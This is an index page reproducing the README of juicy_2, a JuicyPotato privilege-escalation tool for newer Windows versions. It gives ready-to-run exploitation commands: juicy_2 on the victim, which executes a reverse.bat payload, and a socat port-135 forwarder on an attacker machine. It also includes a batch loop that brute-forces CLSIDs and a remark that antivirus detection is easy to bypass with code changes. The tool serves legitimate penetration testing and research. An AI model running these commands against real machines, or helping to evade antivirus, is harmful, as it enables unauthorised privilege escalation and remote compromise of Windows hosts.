Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/decoder-it/juicy_2

juicypotato for win10 > 1803 & win server 2019
https://github.com/decoder-it/juicy_2

Last synced: 21 days ago
JSON representation

juicypotato for win10 > 1803 & win server 2019

Awesome Lists containing this project

README

        

# juicy_2
JuicyPotato for Win10 > 1803 & Win Server 2019

Please read my blog post first: https://decoder.cloud/2020/05/30/the-impersonation-game/



Disclaimer:

This is just a quick & dirty modification of our JuicyPotato in order to test valid CLSID's and to impersonate them (YOU NEED IMPERSONATION PRIVILEGES) for newer Windows 10 and Windows Server 2019 platforms.

(I know, this version is catched by Defender and other AV's, but with some modifications in code it's easy to bypass)


Mandatory requisite is to have the possibility to redirect traffic for port 135 on a forwarder machine under you control.

Feel free to improve the code, I was too lazy for this kind of stuff.



For testing CLSID:

juicy_2 -z -x [ip] of socat listener -l [fake oxid resolver port] -n [local RPC server port] -c [CLSID to test]

Example:

on victim:

juicy_2 -z -x 192.168.1.1 -l 9995 -n 9998 -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}

on attacker (192.168.1.1):

socat -v TCP-LISTEN:135,fork,reuseaddr TCP:[victim machine]:9995


For exploitation:

on victim:

juicy_2 -x 192.168.1.1 -l 9995 -n 9998 -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} -t * -p c:\temp\reverse.bat

on attacker (192.168.1.1):

socat -v TCP-LISTEN:135,fork,reuseaddr TCP:[victim machine]:9995



Hunting for juicy CLSID's with a stupid batch:

@echo off

FOR /F %%i IN (clsid.list) DO (

.\juicy_2 -z -x 192.168.1.1 -n 9998 -l 9995 -c %%i >> .\out.txt

timeout /t 2

)